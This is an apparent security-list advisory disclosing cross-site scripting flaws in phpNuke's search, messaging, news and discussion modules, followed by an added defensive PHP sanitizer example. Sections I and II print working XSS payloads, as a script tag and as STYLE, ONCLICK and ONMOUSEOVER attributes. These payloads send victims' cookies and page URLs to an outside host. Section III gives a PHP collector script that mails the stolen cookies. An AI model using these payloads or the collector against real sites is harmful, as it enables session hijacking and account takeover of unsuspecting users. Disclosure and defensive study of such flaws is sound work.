Message-ID: <003401c293e4$92bece80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

phpNuke Module Vulnerabilities Enable Identity Theft

Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft

Description

phpNuke is a popular and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database.  Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges.  Gaining such privileges would likely assist
further compromise of the susceptible system.

I. Search Module Vulnerability

The search module of phpNuke applies no filtering at all to the query term
when echoing it back in the "Results for x..." page, and as a result is
susceptible to reflected cross-site scripting via a simple query such as:

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref="+document.URL+"cookie="+document.cookie;</SCRIPT>

II. Multiple Module Extended Tag Vulnerabilities

phpNuke does a decent job of stripping known malicious tags, but doesn't
take into account the fact that even "safe" tags can carry malicious
attributes (event handlers, or CSS expressions in a STYLE attribute).  This
enables cross-site scripting against the PM module, Discussion module, News
module, etc.; basically any module that accepts user input for an article,
message, or comment can be attacked with HTML such as:

<B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref=\'+document.URL+\'cookie=\'+document.cookie'))">Bold text -- or an attack?</B>

<B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>

<B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Keep Away!</B>
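The following PHP is an added, defender-side example written for this archive copy; it is not phpNuke's code and is not part of the original advisory.  It shows the two fixes that Sections I and II call for: output-encoding the reflected search term, and an HTML sanitizer for user-submitted content that allowlists not just tags but also the attributes permitted on each tag, so that STYLE, ONCLICK, ONMOUSEOVER and similar attributes on an otherwise "safe" tag are dropped.  The function names, the allowlist and the sample inputs are my own assumptions, not anything from phpNuke.

```php
<?php
// Added example (not phpNuke's code): output encoding for a reflected
// search term, plus an attribute-aware HTML sanitizer for user content.

// Section I fix: the search term is data, not markup. Encode every
// HTML-significant character before writing it back into the page.
function render_search_heading(string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Results for {$safe}...</h2>";
}

// Section II fix: a tag allowlist alone is not enough, because attributes
// carry script too. Each allowed tag lists the only attributes it may keep.
// (Assumed allowlist; a real site would tune this to its own needs.)
const ALLOWED_TAGS = [
    'b' => [], 'i' => [], 'u' => [], 'p' => [], 'br' => [],
    'a' => ['href'],
];

function sanitize_html(string $fragment): string
{
    $doc = new DOMDocument();
    // Suppress libxml warnings about sloppy user markup; the XML PI prefix
    // makes libxml read the fragment as UTF-8. The wrapper div gives us a
    // single root whose children we serialise afterwards.
    $prev = libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $fragment . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    // The outermost div is ours; any div inside the fragment comes later
    // in document order and is handled by the allowlist.
    $root = $doc->getElementsByTagName('div')->item(0);
    clean_node($root);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function clean_node(DOMNode $node): void
{
    // Iterate over a snapshot: we mutate the live child list while walking.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!array_key_exists($tag, ALLOWED_TAGS)) {
                // Disallowed element: keep its text, lose the markup.
                $text = $child->ownerDocument->createTextNode($child->textContent);
                $node->replaceChild($text, $child);
                continue;
            }
            foreach (iterator_to_array($child->attributes) as $attr) {
                $name = strtolower($attr->name);
                if (!in_array($name, ALLOWED_TAGS[$tag], true)) {
                    // STYLE, ONCLICK, ONMOUSEOVER, ... all land here.
                    $child->removeAttribute($attr->name);
                } elseif ($name === 'href'
                          && !preg_match('#^https?://#i', trim($attr->value))) {
                    // Only absolute http(s) links; rejects javascript: etc.
                    $child->removeAttribute($attr->name);
                }
            }
            clean_node($child);
        } elseif (!($child instanceof DOMText)) {
            // Comments, PIs and the like have no place in user content.
            $node->removeChild($child);
        }
    }
}

// Constructed sample inputs (mine, not the advisory's payloads), one per
// attribute vector the advisory describes, plus a link and a script tag.
$samples = [
    '<B STYLE="left:expression(alert(1))">bold</B>',
    '<b onclick="alert(1)">click</b>',
    '<b onmouseover="alert(1)">hover</b>',
    '<a href="javascript:alert(1)">bad</a> <a href="https://example.com/">ok</a>',
    '<script>alert(1)</script><i>plain</i>',
];
foreach ($samples as $s) {
    echo sanitize_html($s), "\n";
}
echo render_search_heading('<script>x</script>'), "\n";
```

The sanitizer deliberately parses with a real HTML parser rather than matching tags with regular expressions: the advisory's point is that a tag-level filter passes the very markup that carries the script, and regex filters are also easy to confuse with malformed or nested markup.  Anything not on the allowlist is reduced to its text content, and `href` is restricted to absolute `http(s)` URLs so that `javascript:` links do not survive either.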

III. Exploit Script

<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>

Vendor Response

I've contacted www.phpnuke.org through a private message, but if anyone
knows a more reliable contact for them, please do use it, as this is not
likely the only route of contact.  I sent a PM to "nukelite" with an example
exploit in it.  I expect that future BETA releases will eliminate this
vulnerability.  I am submitting this to the list so that vulnerable
administrators may make the necessary revisions to prevent this
vulnerability.  The versions available for download on www.phpnuke.org, as
well as the version deployed there, remain vulnerable at the time of this
writing.
